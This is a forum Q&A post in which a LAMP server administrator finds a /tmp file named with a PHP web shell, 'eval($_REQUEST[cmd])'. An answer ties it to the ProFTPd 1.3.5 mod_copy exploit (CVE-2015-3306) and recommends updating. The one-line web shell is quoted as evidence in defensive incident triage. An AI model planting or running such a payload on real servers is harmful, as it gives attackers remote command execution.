# PHP code in filename located in /tmp folder. How worried should I be?

Tags: php, shellcode

I recently discovered a hidden file in `/tmp` owned by `proftpd` that worries me a bit:

```
-rw-r--r--  1 proftpd         nogroup       <timestamp>       86  .<?php eval($_REQUEST[cmd]); ?>
```

I tried to see its content in a text editor, but this was probably a bad move since it alters the last access time property. Anyway here is the output from `stat`:

```
  File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
  Size: 86          Blocks: 8          IO Block: 4096   regular file
Device: fc00h/64512d    Inode: 175564      Links: 1
Access: (0644/-rw-r--r--)  Uid: (  113/ proftpd)   Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
Birth: -
```

Checking the proftpd log at the time the file was modified gives me a lot of entries like this:

```
<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory
```

Could this file be used as part of an exploit?

I am working in a LAMP server environment.

Answer (score 4, accepted):

It seems that someone is using this exploit:

**ProFTPd 1.3.5 - File Copy**

https://www.exploit-db.com/exploits/36742/

Here is also **CVE-2015-3306**:

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306

Check your proftpd version `proftpd -v`, if it's still old version then update to `1.3.6rc1`. If you want something better, then consider to use `sftp` and not `ftp`.